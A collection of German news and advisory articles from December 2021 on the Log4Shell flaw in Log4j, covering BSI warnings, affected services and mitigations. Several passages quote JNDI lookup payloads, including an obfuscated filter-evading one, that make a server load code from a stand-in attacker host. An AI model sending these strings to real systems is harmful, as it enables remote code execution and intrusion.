Zunächst: Die Gefahr ist real; das Bundesamt für Sicherheit in der Informationstechnik (BSI) tat gut daran, Samstag Nacht die Warnstufe Rot auszurufen. Das Ausnutzen der Lücke ist tatsächlich denkbar einfach, die Zahl der anfälligen Systeme unüberschaubar und Sicherheitsfirmen sehen bereits Log4j-Angriffe von über 500 IP-Adressen. Die Mehrzahl davon sind aktuell noch sogenanntes Fingerprinting, bei dem man versucht, anfällige Systeme zu finden. Vieles davon dürften Forscher sein, die sich nur ein Bild der Lage machen wollen.
Doch Microsoft etwa berichtet auch bereits von ersten echten Angriffen, bei denen auf den attackierten Systemen Cobalt Strike Beacons platziert wurden. Damit verschafft sich ein Angreifer einen Brückenkopf im Netz seines Opfers, um dieses weiter auszuspionieren und typischerweise dann mit Ransomware zu erpressen. Ransomware-Angriffe über Log4j sind eine echte Bedrohung.
*** Die Ursache
Das Problem entsteht, wenn ein Dienst ein Ereignis wie „Habe X getroffen“ protokolliert. Im Java-Universum kommt dabei häufig die Bibliothek Log4j zum Einsatz. Und die schreibt das nicht nur weg; sie versucht, den Text X zu interpretieren. Und wenn der etwas wie
. ${jndi:ldap://boser.server.de/a}
enthält, dann knallt es. Der Dienst kontaktiert „boser.server.de“, nimmt von diesem Java-Code entgegen und führt den aus. Ja, genau – einfach so. Da kommen dann Krypto-Miner oder gefährliche Hintertürprogramme wie die erwähnten Cobalt Strike Beacons auf das System. Deshalb heißt der Angriff auch Log4Shell, also „Logging, um einen direkten Zugriff aufs System zu erhalten“.
Wenn ein iPhone eine solche Zeichenkette im Namen hatte, rappelte es in Apples iCloud (das ist jetzt hoffentlich schon gefixt); wenn ein Tesla sich damit meldete, hatte der E-Auto-Konzern ein Problem und so geht es weiter. Dabei muss die problematische Zeichenkette auch nicht im Namen stecken. Es kann auch der Ort oder sogar die Uhrzeit (Timezone) sein. Oder der Text einer Fehlermeldung, die vorsichtshalber protokolliert wird. Die Möglichkeiten sind endlos.
Das Heise-Security-Webinar zu Log4Shell am 20. Dezember 2022
Das Webinar zur Log4j-Lücke gibt Administratoren und Sicherheitsverantwortlichen das nötige Wissen und Werkzeug für den verantwortungsvollen Umgang mit Log4Shell an die Hand.
*** Schutz vor Log4shell
Es gibt derzeit keine offizielle Liste, was von der Schwachstelle CVE-2021-44228 betroffen ist und was nicht. Ein französischer Sicherheitsforscher pflegt immerhin eine inoffizielle Liste mit bereits über 100 Einträgen zu Log4j-Advisories, in der man nach seinen Produkten suchen kann. Weltweit rotieren derzeit Hersteller (hoffentlich!), um ihre Produkte auf diese Schwachstelle abzuklopfen und diese dann zu beseitigen. Da rollt eine riesige Welle von Sicherheits-Updates auf uns zu.
Als Anwender kann man da aktuell nicht viel anderes tun, als abzuwarten, beim Hersteller nachzufragen und ankommende Patches schnellstmöglich zu installieren. Die gute Nachricht ist, dass Endanwender nicht im Fokus stehen. Das Problem betrifft vorrangig die Betreiber von Diensten und IT-Infrastruktur. Aber auch Endanwender könnte es etwa durch anfällige IoT-Gerätschaften erwischen.
Administratoren in Firmen haben jetzt aber einen Haufen Arbeit vor sich: Da bereits erste ernsthafte Angriffe gesichtet wurden, stehen bald erste Erpressungen durch Cybercrime-Banden ins Haus, die über Log4Shell ins Firmennetz gekommen sind. Admins müssen also jetzt dafür sorgen, dass sie ihre Unternehmens-IT schnellstmöglich absichern oder zumindest aus der Schusslinie bringen. Dazu kann ich ein paar Tipps beisteuern, was funktioniert und was nicht.
*** Filtern und Blockieren
Der naheliegende Gedanke ist, die gefährlichen Zeichenketten auf einem vorgelagerten Gerät wie einer Web Application Firewall (WAF) zu erkennen und zu blockieren. Es gibt auch schon erste Hersteller, die mit beeindruckenden Statistiken aufwarten, wie viele Angriffe sie auf diesem Weg bereits abgewehrt haben.
Doch das Problem ist, dass es fast beliebig viele Möglichkeiten gibt, dieser Erkennung zu entgehen. So kann ein Angreifer das etwa als
. ${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attacker.com/a}
verschleiern. Das umgeht praktisch alle Filter, löst aber trotzdem den Angriff aus. Die WAF-Hersteller blockieren also hauptsächlich harmlose Scans von Skript-Kiddies und Sicherheitsforschern, die sich ein Bild der Lage verschaffen wollen. Ernsthafte Angriffe können sie zumindest über sogenannte Regular Expressions nicht erkennen. Florian Roth, ein weltweit anerkannter Experte auf diesem Gebiet, hat daraufhin bereits das Handtuch geworfen.
Cloudflare versucht übrigens derzeit seine Kunden auf diesem Weg zu schützen. Der Dienstleister blockiert etwa Anfragen, bei denen der Browser einen verdächtigen User-Agent angibt. Das kann man machen. Aber ich bin mir nicht sicher, ob das nicht letztlich mehr falsche Sicherheit vorspiegelt, als dass es wirklich ernste Angriffe verhindert.
*** Böse IP-Adressen
Ähnliches gilt für die IP-Adressen der Angreifer. Es gibt bereits Listen von IP-Adressen, von denen solche Log4Shell-Angriffe ausgehen. Die meisten dieser IP-Adressen sind derzeit Tor-Exit-Nodes, sodass man den eigentlichen Urheber nicht feststellen kann. Es liegt nahe, diese IP-Adressen oder (zumindest temporär) sogar alle Tor-Exit-Nodes auf der Firewall zu sperren. Doch ernsthafte Angreifer – also Cybercrime und APTs – nutzen für solche Angriffe typischerweise Server im normalen Internet. Die auffälligen Tor-Exit-Nodes deuten vielmehr auf Forscher und Script-Kiddies hin.
Tor blockieren hilft also nicht viel gegen ernste Bedrohungen. Wenn man aber einen ständig aktualisierten Feed mit qualifizierten Attacker-IPs hat, könnte der helfen, einen Angriff abzuwehren. Das Problem dabei: Ich habe noch keinen gesehen, der das leistet (wer einen kennt, sage mir gerne per Mail Bescheid).
Dienste testen
Doch genug von dem, was alles nicht funktioniert. Es gibt einiges, was man tatsächlich sinnvoll tun kann und sollte. Zunächst einmal sollte man sich einen Überblick verschaffen, wo Probleme lauern könnten. Dabei ist es natürlich sinnvoll beim Hersteller beziehungsweise Anbieter der jeweiligen Software, Geräte und Dienste nach dem Stand der Dinge zu fragen. Im Idealfall gibt es bereits Updates oder ein klares: „Wir haben das geprüft und sind nicht betroffen.“
Wer Zugang zum System hat, auf dem ein Dienst läuft, kann dort nach verwundbaren Instanzen der Log4J-Bibliothek suchen. Das ist nicht trivial, da diese typischerweise in den Java-typischen JAR-Archiven stecken. Der log4j-detector durchsucht diese und meldet anfällige Versionen von Log4J 2.x (2.0-beta9 bis 2.14.1). [Update: Beachten Sie, dass das immer noch Work-in-Progress ist und bei der Analyse durchaus Fehler auftreten können.]
Zudem kann man Dienste auch selber gezielt testen. Dazu erstellt man einen passenden String und verteilt den systematisch an potenziell anfällige Dienste. Das Problem ist, dass man in der Regel kein direkt sichtbares Feedback bekommt, ob etwa beim Aufruf einer Web-Seite Log4Shell bereits zugeschlagen hat. Da springt der Dienst CanaryTokens in die Bresche.
https://www.heise.de/ratgeber/Schutz-vor-schwerwiegender-Log4j-Luecke-was-jetzt-hilft-und-was-nicht-6292961.html
CYBERSICHERHEIT – Mehrere Bundesbehörden von schwerer IT-Schwachstelle betroffen – 12.12.2021
Berlin – Mehrere Stellen in der Bundesverwaltung waren wegen der schwerwiegenden Log4j-Sicherheitslücke für Cyber-Angriffe verwundbar. Das haben Überprüfungen des Bundesamts für Sicherheit in der Informationstechnik (BSI) ergeben, berichtet der „Spiegel“.
Hintergrund ist die für Hackerangriffe anfällige Programmbibliothek Log4j, die bei einer einstelligen Zahl an Bundesbehörden zum Einsatz kommt. „Bei einer Schwachstelle mit dieser Verbreitung ist auch die Bundesverwaltung betroffen“, heißt es aus dem BSI. Der Behörde seien einzelne verwundbare Systeme bekannt und man habe bereits entsprechende Schutzmaßnahmen eingeleitet. Bisher liegen keinerlei Hinweise vor, dass die Schwachstelle in der Bundesverwaltung tatsächlich ausgenutzt wurde. Zumindest in einigen Fällen konnte das BSI nachvollziehen, dass die Probleme bereits behoben wurden.
Hacker können durch die Schwachstelle theoretisch eigene Schadsoftware nachladen und so Daten stehlen. Seit Freitag warnen IT-Fachleute in aller Welt, weil es sich bei Log4j um eine äußerst weitverbreitete Programmbibliothek handelt. Am Samstag hatte das BSI die höchste, rote Warnstufe wegen der Sicherheitslücke ausgerufen. Gleichzeitig wurde nach „Spiegel“-Informationen auch das IT-Krisenreaktionszentrum der Behörde aktiviert.
Dabei handelt es sich um ein aufgestocktes Lagezentrum, in dem seitdem rund um die Uhr mehrere Personen mit dem Problem befasst sind. Im nationalen Cyberabwehrzentrum ist die Schwachstelle ebenfalls thematisiert worden. Das Innenministerium wurde mehrfach über die aktuellen Vorgänge unterrichtet, auch weil das Thema auf der Bundespressekonferenz am Montag eine Rolle spielen könnte. Außerdem hat eine einstellige Anzahl an Unternehmen aus dem Bereich Kritische Infrastruktur dem BSI gemeldet, dass sie von der Schwachstelle betroffen seien.
https://www.finanznachrichten.de/nachrichten-2021-12/54730163-mehrere-bundesbehoerden-von-schwerer-it-schwachstelle-betroffen-003.htm
CYBERSICHERHEIT – Alarmstufe Rot – Von Log4j-Lücke betroffen: Mehrere Behörden anfällig für Hacker-Angriffe – 12.12.2021
Beim BSI herrscht Alarmstufe Rot, seit die Log4j-Sicherheitslücke bekannt ist. Einem Bericht zufolge ist nun auch klar, dass mehrere Stellen der Bundesverwaltung potenzielles Einfallstor für Hacker-Attacken war – nach allem, was bisher bekannt ist, jedoch ohne Folgen.
https://www.n-tv.de/politik/Mehrere-Behoerden-anfaellig-fuer-Hacker-Angriffe-article22994589.html
CYBERSICHERHEIT – Warnstufe Rot: Log4j-Zero-Day-Lücke bedroht Heimanwender und Firmen – Systeme abschalten, Verbindungen blockieren: Das BSI rät wegen der Zero-Day-Lücke in Log4j zu extremen Maßnahmen, Schadcode soll direkt ausführbar sein – Auch Heimanwender gefährdet – 12.12.2021
Das Bundesamt für Sicherheit in der Informationstechnik (BSI) hat die am Freitag bekannt gewordene Zero-Day-Lücke in der weit verbreiteten Java-Bibliothek Log4j nachträglich hochgestuft. Es gilt nun die höchste Warnstufe Rot. Man habe beobachtet, dass die Schwachstelle ohne explizites Nachladen von Schadcode ausgenutzt werden könne, womit ein Großteil der zuvor empfohlenen Gegenmaßnahmen ins Leere läuft.
Maliziöser Code könne direkt in der Abfrage enthalten seien, sodass auch Grundschutz-konforme Systeme gefährdet seien, die keine Verbindung ins Internet aufbauen können. Als akute Maßnahmen empfiehlt das BSI, nicht zwingend benötigte Systeme abzuschalten, Netzwerke zu segmentieren, um verwundbare Systeme zu isolieren und soweit wie möglich etwa durch den Einsatz von Proxies in HTTP-Headern Inhalte durch statische Werte überschreiben zu lassen. Außerdem sollte auf Systemen, die unabdingbar für Geschäftsprozesse sind und nicht abgeschaltet werden können, ein umfangreiches Logging erfolgen und auch ein- sowie ausgehende Verbindungen protokolliert werden, um im Nachgang leichter herausfinden zu können, ob ein System kompromittiert wurde.
Weil die Java-Bibliothek Log4j als Komponente in extrem vielen Java-Anwendungen steckt, ist im Moment nicht absehbar, wie viele Internetdienste auch von namhaften Firmen von der Zero-Day-Lücke betroffen sind, die das Ausführen von beliebigem Code erlaubt. Auf GitHub gibt es eine bei weitem nicht vollständige Liste von Diensten, bei denen der am Freitag veröffentlichte Proof-of-Concept-Code (PoC) der Pen-Testing-Gruppe 0x0021h angeschlagen hat. Es ist ein Who-is-Who der bekanntesten Firmen und reicht von Amazon und Apple über CloudFlare, Google, IBM, Tesla und Twitter bis zu VMWare.
*** Auch Heimanwender gefährdet
Doch nicht nur Großkonzerne sind gefährdet, Log4j steckt auch in vielen Netzwerk- und Systemkomponenten, die auch in kleinen Firmen, aber auch von Privatpersonen und Mitarbeitern im Home-Office eingesetzt werden. So hat Ubiquiti, bei Heimanwendern vor allem für seine Meshing-fähigen WLAN Access Points bekannt, bereits eingeräumt, dass das Konfigurations- und Verwaltungs-Frontend UniFi Network Application verwundbar ist und ein Update bereitgestellt.
Für Firmen, deren Mitarbeiter derzeit Corona-bedingt von zu Hause aus arbeiten und sich mit ihren privaten Rechnern per VPN ins interne Firmennetzwerk einklinken, ist dies eine alarmierende Nachricht. Die UniFi Network Application kommt aber auch in vielen Hotels, Geschäften, Banken, Arztpraxen und kleinen Firmen zum Einsatz, um Besuchern mittels Vouchern einen Internetzugang via Gäste-WLAN anzubieten. Auch Netzwerkkomponenten anderer Hersteller könnten von der Lücke betroffen sein, Cisco etwa hat ebenfalls schon einige verwundbare Produkte entdeckt, bei Dutzenden anderen Cisco-Produkten laufen die Untersuchungen noch. Die meisten Hersteller hüllen sich aktuell jedoch noch in Schweigen.
Sicherheitssysteme betroffen
Es sind aber nicht nur Server und Netzwerkkomponenten von der Log4j-Lücke betroffen, laut Cisco ist auch das Kameraüberwachungssystem Cisco Video Surveillance Operations Manager verwundbar. In Zugangssystemen wie digitalen Schließsystemen und in der Automatisierungstechnik sowie Smart Home ist Java ebenfalls weit verbreitet – ob auch diese Systeme durch die Zero-Day-Lücke in Log4j kompromittierbar sind, weiß noch niemand.
Sicherheitsspezialisten auf der ganzen Welt arbeiten trotz Wochenende fieberhaft daran, verwundbare Systeme zu identifizieren und Lücken zu stopfen. Sie liefern sich einen Wettlauf mit den Angreifern, die derzeit ebenfalls Überstunden schieben. Laut der Pressemitteilung wurden dem BSI aus mehreren CERT-Quellen weltweite Massenscans und Angriffe gemeldet, es gebe auch erste erfolgreiche Kompromittierungen, unter anderem mit Kryptominern. Das BSI empfiehlt, zur Verfügung stehende Updates sofort einzuspielen und qualifiziertes IT-Personal einzusetzen, um kritische, vor allem von außen erreichbare Systeme engmaschig zu überwachen. Für Admins bedeutet dies alles andere als ein ruhiges Wochenende. (mid)
https://www.heise.de/news/Roter-Alarm-Log4j-Zero-Day-Luecke-bedroht-Heimanwender-und-Firmen-6292863.html
CYBERSICHERHEIT – Kritische Zero-Day-Lücke in Log4j gefährdet zahlreiche Server und Apps – Apple, Twitter, Amazon und tausende andere Dienste sind anfällig; erste Angriffe laufen bereits. Admins sollten unbedingt jetzt handeln. – 10.12.2021
Über eine kritische Zero-Day-Sicherheitslücke namens Log4Shell in der weitverbreiteten Java-Logging-Bibliothek Log4j können Angreifer beliebigen Code ausführen lassen. Betroffen sind etwa Dienste von Apple, Twitter, Steam, Amazon und vermutlich sehr viele kleinere Angebote. Es gibt Proof-of-Concept-Code, der das Ausnutzen der Lücke demonstriert und auch bereits erste Angriffe. Seit Kurzem steht ein Quellcode-Update des Apache-Projekts bereit; Admins sollten dringend aktiv werden.
Ein Angreifer kann die Sicherheitslücke ausnutzen, indem er manipulierte Anfragen an einen verwundbaren Server oder eine angreifbare Anwendung schickt. Der Proof-of-Concept-Code (PoC) der Pen-Testing-Gruppe 0x0021h zeigt, dass der Angreifer eine Zeichenkette der Form ${jndi:ldap://127.0.0.1:1389/a} ins Protokoll schreibt. Der Verzeichnisdienst JNDI kontaktiert den genannten LDAP-Server 127.0.0.1:1389 und nimmt schließlich von ihm Daten wie potenziell bösartige Java-Klassen entgegen und führt diese aus. Ein Angreifer müsste demnach einen von ihm kontrollierten Server angeben, um einen Server über das Logging zu kapern (Log4Shell).
*** Verwundbare Projekte
Die Zero-Day-Lücke Log4Shell hat bereits eine CVE-Nummer erhalten (CVE-2021-44228, Risiko kritisch, CVSSv3 10/10). Sie reißt in zahlreiche Dienste und Anwendungen Sicherheitslücken, die die Log4j-Bibliothek einsetzen. Die Pen-Testing-Gruppe 0x0021h schreibt zu ihrem PoC-Exploit, dass er für Apache Struts2, Apache Solr, Apache Druid, Apache Flink und weitere funktioniere.
Ein weiterer Nutzer sammelt in einem github-Projekt verwundbare Dienste und Programme mit Screenshots als Beleg. Darunter sind viele namhafte wie Amazon, Apple iCloud, Cloudflare, Steam oder Twitter. Bei den Anwendungen tauchen unter anderem die von 0x0021h genannten sowie etwa das populäre Minecraft auf. Diverse Sicherheitsforscher berichten über Scans, die nach verwundbaren Diensten suchen und unter anderem das CERT der Deutschen Telekom beobachtet auch bereits erste Angriffe.
*** Angreifbare Bibliothek
Betroffen von der Sicherheitslücke ist Log4j von Version 2.0-beta9 bis 2.14.1. Das Apache-Projekt hat kurzfristig Version 2.15.0 veröffentlicht, die die Lücke schließt. In einer Sicherheitsmeldung listen die Apache-Entwickler zudem Maßnahmen auf, wie man die Server ohne Update vorläufig sichern kann. Bei Log4j ab Version 2.10 helfe das Setzen der Systemeigenschaft „log4j2.formatMsgNoLookups“ auf “true” oder das Entfernen der JndiLookup-Klasse aus dem Klassenpfad (etwa mit dem Befehl zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class).
Das Heise-Security-Webinar zu Log4Shell am 20. Dezember 2022
Das Webinar zur Log4j-Lücke gibt Administratoren und Sicherheitsverantwortlichen das nötige Wissen und Werkzeug für den verantwortungsvollen Umgang mit Log4Shell an die Hand.
In Kürze sollten Linux-Distributionen und Apache-basierte Projekte daher aktualisierte Pakete ausliefern, die Administratoren so rasch wie möglich installieren sollten.
Die Lücke erinnert an ShellShock: Damals waren viele Server durch eine Sicherheitslücke im Kommandozeileninterpreter Bash kompromittierbar. Einzelne Stimmen hatten darin sogar Wurm-Potenzial ausgemacht, also dass Schadcode automatisch von Server zu Server „kriechen“ könnte.
[Update 13.12.2021 07:45 Uhr] Das Apache-Projekt hat den Hinweis entfernt, dass die Java-Version Java 8u121 dem Problem abhelfe. Wir haben das in Meldung angepasst. (dmk)
https://www.heise.de/news/Kritische-Zero-Day-Luecke-in-log4j-gefaehrdet-zahlreiche-Server-und-Apps-6291653.html